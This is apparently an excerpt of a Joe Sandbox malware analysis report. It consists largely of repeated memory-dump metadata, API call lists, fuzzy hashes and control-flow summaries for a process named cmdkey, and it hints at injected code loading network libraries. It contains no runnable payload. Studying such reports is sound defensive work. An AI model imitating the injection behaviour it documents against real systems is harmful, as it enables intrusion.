• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 230134586756b4bf8a1a9c93e66e206fb538325b0cefe4baf0985442fe521378
                                                                                                                                                                                                                                                                • Instruction ID: 6240afaf857831e0f159de987b1bc981b8a8ff6e5da2f79d7805a61e68704d23
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230134586756b4bf8a1a9c93e66e206fb538325b0cefe4baf0985442fe521378
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7990023130550817D511A1584644707005987D0341F91C816A451855CDD7668952B121
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 16a48eb2958db7aceb33062b3936f6dae86bfb163bc3795a6f823744eaa7a5cc
                                                                                                                                                                                                                                                                • Instruction ID: 5e3ba22c7aaf9fbb4d27208ef15096436f4effea2caef05355c2b3bf5ecace22
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16a48eb2958db7aceb33062b3936f6dae86bfb163bc3795a6f823744eaa7a5cc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC900221346545565945F1584544507405697E0341791C416A5508954CC6369856E621
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 8c052bab52b51d75c0cc470f3a3e598d05b82fe2367a6788643989e8fec16eac
                                                                                                                                                                                                                                                                • Instruction ID: 9e001bdad874c9f9dc526d8b83f20457e9f99ead72fa2d5579b7ee1998a6ea54
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c052bab52b51d75c0cc470f3a3e598d05b82fe2367a6788643989e8fec16eac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3890022931750406D580B158554860A005587D1302F91D819A410955CCCA2588696321
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
• Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 240afc75accbcc90d1e915e254b5ab730fe310952ff87c497565a20ddc257b8e
                                                                                                                                                                                                                                                                • Instruction ID: b12ea425e3376d70b940bdaf3492fe691e6039f0bf15db07a690179219d5789f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 240afc75accbcc90d1e915e254b5ab730fe310952ff87c497565a20ddc257b8e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D90022130550407D540B15855586064055D7E1301F51D415E4508558CDA2588566222
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21525817867.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3680000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: MuW
                                                                                                                                                                                                                                                                • API String ID: 0-3612093263
                                                                                                                                                                                                                                                                • Opcode ID: 678ba1d346f937c2961ae1e9b31601c3db148a2dd7c6f1bda2fc835376b364b3
                                                                                                                                                                                                                                                                • Instruction ID: 3963b0272833994fb78374312d9c16c703923e95b90a85098aea5931ec195f7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 678ba1d346f937c2961ae1e9b31601c3db148a2dd7c6f1bda2fc835376b364b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E092B2559BA3CAC706DB5DC155749FF64EF53550729908AC8C34A51AC322454A8BA0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 517 3010e40-3010e41 518 3010e43-3010e45 517->518 519 3010e4e-3010e5e 517->519 520 3010e47 518->520 521 3010e78-3010eca call 302c080 call 3014620 call 3001410 call 3021d70 518->521 520->519 531 3010eea-3010ef0 521->531 532 3010ecc-3010edb PostThreadMessageW 521->532 532->531 533 3010edd-3010ee7 532->533 533->531
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 03010ED7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                • String ID: 45-0FIUV$45-0FIUV
                                                                                                                                                                                                                                                                • API String ID: 1836367815-1613426581
                                                                                                                                                                                                                                                                • Opcode ID: 022db6098b736b19fe17e2dc7cdfd5a264a67e74bcc446241e34d496b2556ca9
                                                                                                                                                                                                                                                                • Instruction ID: 10b1788b849418fb88dea35a1366118030621f3eaee8752bc6e473ec1076be4a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 022db6098b736b19fe17e2dc7cdfd5a264a67e74bcc446241e34d496b2556ca9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1114C72901248B7DB10DB91AC40DEFF7BCEF44764F098199E948AB100E2364E528BE0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 534 3010e60-3010e7f call 302b670 537 3010e85-3010eca call 3014620 call 3001410 call 3021d70 534->537 538 3010e80 call 302c080 534->538 546 3010eea-3010ef0 537->546 547 3010ecc-3010edb PostThreadMessageW 537->547 538->537 547->546 548 3010edd-3010ee7 547->548 548->546
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 03010ED7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                • String ID: 45-0FIUV$45-0FIUV
                                                                                                                                                                                                                                                                • API String ID: 1836367815-1613426581

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 614 3010df7-3010df9 615 3010e24-3010eca call 3021d70 614->615 616 3010dfb-3010e07 614->616 621 3010eea-3010ef0 615->621 622 3010ecc-3010edb PostThreadMessageW 615->622 616->615 622->621 623 3010edd-3010ee7 622->623 623->621
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 03010ED7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                • String ID: 45-0FIUV$45-0FIUV
                                                                                                                                                                                                                                                                • API String ID: 1836367815-1613426581

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 624 3010e23-3010eca call 3021d70 628 3010eea-3010ef0 624->628 629 3010ecc-3010edb PostThreadMessageW 624->629 629->628 630 3010edd-3010ee7 629->630 630->628
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 03010ED7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                • String ID: 45-0FIUV$45-0FIUV
                                                                                                                                                                                                                                                                • API String ID: 1836367815-1613426581
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 03023CEB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03014692
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,0301844E,00000010,?,?,?,00000044,?,00000010,0301844E,?,?,?), ref: 03029963
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009B35
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009B35
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03028490
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Path$NameName_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3514427675-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03014692
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(03011AE6,?,0302580B,03011AE6,030257FF,0302580B,?,03011AE6,030257FF,00001000,?,?,00000000), ref: 0302985F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFEB8,00000007,00000000,00000004,00000000,03013EA1,000000F4), ref: 030298AC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeHeap
